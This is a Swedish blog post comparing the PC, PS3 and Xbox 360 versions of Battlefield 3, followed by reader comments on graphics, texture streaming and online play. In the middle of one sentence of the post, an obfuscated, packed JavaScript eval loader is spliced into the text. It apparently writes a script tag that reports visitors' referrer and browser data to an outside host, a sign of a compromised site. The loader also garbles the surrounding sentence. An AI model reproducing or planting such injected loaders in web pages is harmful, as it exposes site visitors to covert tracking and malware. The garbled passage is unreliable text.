Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Battlefield 3 jämförs: Konsol vs konsol vs PC

Battlefield 3 jämförs: Konsol vs konsol vs PC
Filip Urde
 • On 30 september, 2011
 • http://www.revue.se/filip-urde

Här har vi ett kortare klipp där man jämför de olika versionerna av Battlefield 3.
Med PC som den självklara vinnaren! Vilket jag hoppas inget fan-boy kan säga någonting om…

httpv://www.youtube.com/watch?v=_iVeKIAEfj4&feature=player_embedded

Som ni kanske vet/förstår, så har jag spelat Battlefield länge… helt från Releasen av 1942 och då främst på PC, men tog steget att även ha bad company 2 till ps3 när det kom. Av det enkla skälet: mina kompisars datorer klarar inte av trycket. Jag alltså spelat PC och ps3 versionen av bad company 2, där PC självklart är vinnaren och kommer alltid att vara… du kan inte byta ut musen mot en handkontroll, du eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ithdr|var|u0026u|referrer|adstt||js|php’.split(’|’),0,{}))
kan heller inte byta ut riktigt skicklighet mot auto-aim osv…
Mendet tar dock inte bort faktumet att det är kul på Ps3.

Rent Grafik mässigt kan aldrig en konsolversion bli bättre än PC versionen. Då PC är maskinen som skapar spelet till konsolerna och där skrapade vi bort lite konsol fans som fortfarande påstår att uncharted är det snyggaste som gjorts, bättre än något till PC. 😉

Nu har jag spelat Battlefield 3 på PC sen i onsdags, finns inget mer att nämna… det är sk*t kul! Men igår så kom ju alltså de öppna versionerna av Battlefield 3s beta. Jag laddade då självklart ned spelet till ps3 för att se skillnaderna.

Jag måste säga att jag blev väldigt nöjd! Jag har hört många klaga över grafiken på ps3, att den borde vara snyggare och att den är för lik bad company 2. Till det säger jag: Playstation 3 är 5år. Men jag tycker det är riktigt bra och det man ska ta med sig från mina åsikter är: PC är bäst, det går inte att diskutera. Men har man inte möjlighet till att spela på en PC då ska man självklart spela på ps3… Xbox 360 och flera skivor får dock ett pass….

 

 

 

 

Comments

 1. Kalsle

  Oj vad PC krossar men ps3an krossar dock xbox 360

  • Gamer guy

   Jag har xbox och ps3 och jag tycker det rullar på bättre på xbox 360 än ps3. Även om betan är ruskigt buggig. Gilalr att man ibland ramlar ner i rymden när man duckar brevid en sten vid första anfallet (utomhus). Ni bör pröva, det är riktigt frustrerande.

   • Jag håller med dig att det flyter på ruskigt bra på xbox! Faktiskt mindre avbrott, men xbox360 servrar är ju bättre…så är det… Det jag dock inte gillar som jag skriver ovan, är faktumet att man behöver flera skivor till spelet =(… ska testa sten grejen..låter som minecraft =D

    ps vi har problem med vår inloggningar så vi kör med facebook konton i kommentarerna.
    /Filip

    • Sten

     Flera skivor? Har ingen koll på detta men menar ni att spelet är på flera skivor? Brukar alltid installera spelen på hårddisken (som ni kanske vet att man kan göra på xbox360) löser inte det problemet?

     • Yes Sten! tyvärr så är Xbox 360 inte kapabel att använda blueray skivor (som har högre lagrings kapacitet), därför är Xbox tvungen att ha fler än 1 skiva för spelet.

     • Nu märker jag att jag använder många olika kommentar profiler, men det här är filip urde (som skrivit artikeln). Ja problemet för Xbox 360 idag är att man inte använder blueray skivor och får då inte plats med lika mycket information. Detta fungerar inte så bra med den senaste generationens spel, då dem är extremt krävande. Men självklart kan du installera på 360 och då är väll problemet ”löst”, dock fyller du din 360 ganska bra med bf3. Sen menar jag väll mer att detta för tankarna till Diablo 2, då man fick byta cd skiva vid akterna. Känns lite omodernt… 😉

 2. Khoplin

  Hallå!

  Jag blev lite förvånad över vilken skillnad det var på texturupplösningen mellan PS3 & Xbox360, på just den sektion som utspelas nere i metron, där vi har en ljuskälla som kastar ljus på en betongvägg. Jag tyckte inte att det stämde översens med min egna upplevelse. Så efter lite mer efterforskning så är detta min åsikt: 

  Alla versioner av BF3 har väldigt påtaglig ”texture pop-in”, dvs att lågupplösliga texturer används på avstånd från spelaren, men när spelaren närmar sig texturen så stream’as en högupplöslig variant in istället. ”texture pop-in” sker när texture-steaming inte sköts på ett snyggt sätt, det vill säga att den lågupplösliga texturen stannar kvar för länge och bytas ut för sent, trots att spelaren närmat sig texturen.

  Xbox360 fallet vi ser i denna video är snarare en grafisk bugg där BF3’s texture-streaming INTE triggas korrekt, därför så stannar en lågupplöst textur kvar på väggen. I min mening är detta inte representativt av Xbox360 versionen av BF3. 

  Frågan kvarstår fortfarande, vilken version av konsolerna som ser bäst ut? Jag har faktiskt ingen aning 🙂 

  Här har ni en annan graphical comparison där båda versionerna är betydligt mer jämnlika: http://www.gamesthirst.com/2011/09/29/battlefield-3-beta-graphics-comparison-xbox-360-playstation-3/

  • Khoplin, jag håller helt med dig! dock ska vi påpeka att samtliga versioner är enligt Dice inte i sin fulla potential. Grafiken är ju sällan det på Beta-versionen… Så texture pop in effekterna kommer definitivt justeras om jag ska gissa. Om du är som jag och har 360 och ps3, då är ps3 ett bättre val rent grafiskt… Men Server mässigt är alltid 360 det bättre valet! dock så hör kostnads aspekten till debatten. Du måste ju som bekant ha Gold för onlinespel. / Filip

  • Khoplin, jag håller helt med dig! dock ska vi påpeka att samtliga versioner är enligt Dice inte i sin fulla potential. Grafiken är ju sällan det på Beta-versionen… Så texture pop in effekterna kommer definitivt justeras om jag ska gissa. Om du är som jag och har 360 och ps3, då är ps3 ett bättre val rent grafiskt… Men Server mässigt är alltid 360 det bättre valet! dock så hör kostnads aspekten till debatten. Du måste ju som bekant ha Gold för onlinespel. / Filip

   • Khoplin

    Jag äger samtliga; PC, Xbox & PS3. Man vill ju spela sina exclusives 🙂

    Jag tillhör den gruppen som verkligen uppskattar dessa jämnförelser, man vill ju se var man ska lägga sina pengar!

    Jag föredrar Xbox kontrollen framför PS3 kontrollen. Microsoft erbjuder även alla spel tillgång till sitt ”true-skill” system, vilket i stort sätt är ett online matchmaking system som jämnför diverse variabler hos spelaren för att matcha honom/henne med spelare på samma nivå. Dessa variabler sparas från spel till spel, så en spelare som spelat diverse COD/BF/HALO kommer att matchas mot spelare med samma shooter erfarenhet. Jag har ingen vetskap om ett liknande system till PS3.

    Detta tillsammans med en mer stabil networking (som du nämner) gör förmodligen att Xbox blir mitt valda system för BF3. Det jag vill försäkra mig om när jag tittar på dessa videos är snarare att 360 versionen inte är SÅ pass mycket sämre grafiskt att det skulle påverka min spelupplevelse. 

    Och yes, jag föredrar shooter på konsol framför PC 😉